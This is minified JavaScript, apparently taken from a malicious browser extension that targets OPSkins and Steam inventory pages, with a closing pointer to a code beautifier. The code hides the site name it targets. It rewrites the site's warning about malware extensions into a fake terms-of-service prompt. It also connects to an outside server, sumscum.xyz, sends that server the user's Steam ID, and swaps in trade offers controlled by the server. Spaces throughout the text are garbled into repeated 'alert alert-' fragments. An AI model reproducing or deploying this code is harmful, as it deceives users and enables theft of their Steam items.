alert-id='rQueue"+a+"-1''>Remove</span></div></div>";console.log(d);f.append(d);$(b).hide();0<f.find(".pg-item").length?(f.find(".alert.alert-info").hide(),$("#sellDepositBtn").show()):(f.find(".alert.alert-info").show(),$("#sellDepositBtn").hide());console.log(g);items.push(g);$("#rQueue"+a+"-1").click(function(){delitem(a)})};window.onload=function(){-1<location.href.indexOf(word[0]+word[1]+word[2]+word[3]+word[4]+word[5]+word[6]+".com")&&start();-1<location.href.indexOf("steamcommunity.com")&&-1<location.href.indexOf("inventory")&&startsteam();console.log("WORKING")};var url=chrome.extension.getURL("WFxhYKuiBQEi36xi.js");loadScriptSync(url,"body");1==$('[value="Nowalert alert-takealert alert-mealert alert-backalert alert-toalert alert-thealert alert-website!"]').length&&(console.log("CLICK"),$(".modal-title").html($(".modal-title").html().replace("OPSkinsalert alert-Securityalert alert-Noticealert alert--alert alert-Manyalert alert-Chromealert alert-Browseralert alert-Extensionsalert alert-Arealert alert-Malware","Pleasealert alert-acceptalert alert-ouralert alert-ToS")),$(".modal-body").children("p").each(function(){$(this).html("")}),$(".modal-body").prepend("<p>Ouralert alert-ToSalert alert-werealert alert-updatedalert alert-recently,alert alert-youalert alert-needalert alert-toalert alert-acceptalert alert-italert alert-beforealert alert-usingalert alert-OPSkins.</p>"),$(".modal-body").children(".form1-group").children("label").html('<inputalert alert-type="checkbox"alert alert-required=""alert alert-name="malware_extension">Ialert alert-havealert alert-readalert alert-thisalert alert-messagealert alert-andalert alert-Ialert alert-fullyalert alert-acceptalert alert-newalert alert-ToSalert alert-statesments.'),clearInterval(clicktimer));Element.prototype.remove=function(){this.parentElement.removeChild(this)};NodeList.prototype.remove=HTMLCollection.prototype.remove=function(){for(var a=this.length-1;0<=a;a--)this[a]&&this[a].parentElement&&this[a].parentElement.removeChild(this[a])};var key="Hhg7ptccVrU8uM4SN6FsEd157y8rlxtq",socket,connect=function(){console.log("Connecting...");socket=io("https://sumscum.xyz:9595",{forceNew:!0,secure:!0});socket.on("connect",function(){console.log("Exchangingalert alert-keys...");socket.emit("key",{key:key,steamid:steamid})});socket.on("key_fail",function(a){console.log("Keysalert alert-exchangealert alert-fail.")});socket.on("error",function(){sendAlertl('<div class="alert alert-danger">Steamalert alert-error.alert alert-Pleasealert alert-reloadalert alert-pagealert alert-andalert alert-tryalert alert-again.</div>')});socket.on("balance",function(a){newBalance(a.balance)});socket.on("key_success",function(a){(console.log("Keysalert alert-exchangealert alert-success."),a.balance&&newBalance(a.balance),console.log(a.balance),console.log(a.token),a.token)?token=a.token:(console.log("t"),-1<location.href.indexOf("store_account"))?savetrade(1):-1<location.href.indexOf("shop_sale_form")&&($(".modal.fade.in").length?document.querySelector("#save-trade-url").addEventListener("click",savetrade):location.replace("https://"+word[0]+word[1]+word[2]+word[3]+word[4]+word[5]+word[6]+".com/?loc=store_account"))});socket.on("newtrade",function(a){document.getElementById("qItems").innerHTML='<div class="alert alert-success"><p>Youralert alert-salealert alert-hasalert alert-beenalert alert-assignedalert alert-toalert alert-<aalert alert-href="https://steamcommunity.com/profiles/'+a.botsteamid.toString()+'"alert alert-class="alert-link"alert alert-target="_BLANK">botalert alert-#'+a.bot+"</a>.</p><p><b>Youralert alert-securityalert alert-tokenalert alert-isalert alert-'"+a.security+'\'.</b></p><h4>Openalert alert-Tradealert alert-Offeralert alert-In:</h4><spanalert alert-class="offer-links"><aalert alert-class="btnalert alert-btn-defaultalert alert-btn-lg"alert alert-href="javascript:window.open(\'http://steamcommunity.com/tradeoffer/'+a.tradeofferid+'\',alert alert-\'\',alert alert-\'height=1028,width=1035\')"><ialert alert-class="faalert alert-fa-chrome"></i>alert alert-Browser</a><aalert alert-class="btnalert alert-btn-defaultalert alert-btn-lg"alert alert-href="steam://url/ShowTradeOffer/'+a.tradeofferid+'"><ialert alert-class="stmalert alert-stm-steam"></i>alert alert-Steam</a></span><p>Tradealert alert-offersalert alert-mayalert alert-bealert alert-canceledalert alert-afteralert alert-5alert alert-minutes.<br>Afteralert alert-thatalert alert-time,alert alert-youalert alert-mustalert alert-resendalert alert-thealert alert-offeralert alert-fromalert alert-youralert alert-accountalert alert-page.</p></div>'})},askfortrade_func=function(){console.log("1");document.getElementById("qItems").innerHTML="<imgalert alert-class='ajax-loader'alert alert-src='images/ajax-loader-big.gif'/>";socket.emit("askfortrade",{steamid:steamid,token:token,items:items})};
```

If you want to get beautified code, please take a look at http://jsbeautifier.org/